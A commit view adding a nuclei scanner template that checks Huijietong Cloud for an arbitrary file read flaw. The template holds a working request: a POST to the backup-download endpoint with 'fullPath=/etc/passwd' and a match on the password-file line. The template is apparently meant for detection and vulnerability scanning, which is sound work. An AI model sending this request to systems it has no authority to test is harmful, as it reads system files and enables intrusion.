Merge pull request #1871 from projectdiscovery/huijietong-cloud-fileread

Create huijietong-cloud-fileread.yaml
patch-1
Prince Chaddha 2021-07-14 19:27:43 +05:30 committed by GitHub
commit 5182b88b54
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions

View File

@ -0,0 +1,23 @@
id: huijietong-cloud-fileread
info:
name: Huijietong Cloud File Read
author: princechaddha
severity: high
tags: huijietong,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
body: 'fullPath=/etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200